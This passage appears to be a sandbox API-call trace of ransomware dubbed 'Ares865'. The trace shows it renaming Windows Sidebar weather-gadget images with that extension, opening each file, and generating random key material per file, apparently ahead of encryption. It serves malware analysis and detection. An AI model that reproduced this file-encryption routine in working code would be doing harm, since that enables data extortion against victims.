sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_hail.png.ares865"), dwFlags=0x1) returned 1 [0116.951] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_hail.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_hail.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.951] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=38152) returned 1 [0116.951] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.952] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.952] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.956] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.958] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.958] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.959] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_rainy.png.Ares865") returned 100 [0116.959] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_rainy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_rainy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_rainy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_rainy.png.ares865"), dwFlags=0x1) returned 1 [0116.961] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_rainy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_rainy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.961] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=42818) returned 1 [0116.961] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.962] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.962] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.966] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.967] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.967] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_snow.png.Ares865") returned 99 [0116.968] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_snow.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_snow.png.ares865"), dwFlags=0x1) returned 1 [0116.969] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_snow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_snow.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.969] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41183) returned 1 [0116.970] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.970] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.970] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.974] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.975] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.975] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.976] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_thunderstorm.png.Ares865") returned 107 [0116.976] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_thunderstorm.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_thunderstorm.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_thunderstorm.png.ares865"), dwFlags=0x1) returned 1 [0116.978] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_thunderstorm.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_thunderstorm.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.978] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37584) returned 1 [0116.978] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.979] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.979] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.984] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.985] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.985] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.986] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI" [0116.986] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)alertIcon.png.Ares865") returned 105 [0116.986] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)alertIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)alerticon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)alertIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)alerticon.png.ares865"), dwFlags=0x1) returned 1 [0116.988] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)alertIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)alerticon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.989] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=993) returned 1 [0116.989] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.989] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.989] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.993] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.993] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.993] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.994] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)grayStateIcon.png.Ares865") returned 109 [0116.994] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)grayStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)graystateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)grayStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)graystateicon.png.ares865"), dwFlags=0x1) returned 1 [0116.995] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)grayStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)graystateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.995] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=578) returned 1 [0116.996] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.996] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.996] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.999] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.999] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.000] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.000] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)greenStateIcon.png.Ares865") returned 110 [0117.000] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)greenStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)greenstateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)greenStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)greenstateicon.png.ares865"), dwFlags=0x1) returned 1 [0117.002] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)greenStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)greenstateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.002] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=752) returned 1 [0117.002] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.003] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.003] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.006] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.007] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.007] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)notConnectedStateIcon.png.Ares865") returned 117 [0117.008] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)notConnectedStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)notconnectedstateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)notConnectedStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)notconnectedstateicon.png.ares865"), dwFlags=0x1) returned 1 [0117.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)notConnectedStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)notconnectedstateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.009] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=963) returned 1 [0117.009] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.010] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.010] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.018] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.019] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.019] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.019] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)redStateIcon.png.Ares865") returned 108 [0117.019] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)redStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)redstateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)redStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)redstateicon.png.ares865"), dwFlags=0x1) returned 1 [0117.021] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)redStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)redstateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.021] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=963) returned 1 [0117.021] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.022] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.022] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.024] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.025] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.025] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.025] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI" [0117.026] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)alertIcon.png.Ares865") returned 105 [0117.026] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)alertIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)alerticon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)alertIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)alerticon.png.ares865"), dwFlags=0x1) returned 1 [0117.027] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)alertIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)alerticon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.027] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=652) returned 1 [0117.028] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.028] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.028] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.031] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.031] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.031] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.032] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)grayStateIcon.png.Ares865") returned 109 [0117.032] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)grayStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)graystateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)grayStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)graystateicon.png.ares865"), dwFlags=0x1) returned 1 [0117.035] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)grayStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)graystateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.035] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=429) returned 1 [0117.035] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.036] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.036] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.039] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.039] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.039] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.040] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)greenStateIcon.png.Ares865") returned 110 [0117.040] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)greenStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)greenstateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)greenStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)greenstateicon.png.ares865"), dwFlags=0x1) returned 1 [0117.044] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)greenStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)greenstateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.045] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=559) returned 1 [0117.045] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0117.048] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.048] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.052] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0117.053] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.053] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0117.053] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)notConnectedStateIcon.png.Ares865") returned 117 [0117.053] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)notConnectedStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)notconnectedstateicon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)notConnectedStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)notconnectedstateicon.png.ares865"), dwFlags=0x1) returned 1 [0117.057] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)notConnectedStateIcon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)notconnectedstateicon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.057] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=680) returned 1 [0117.058] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 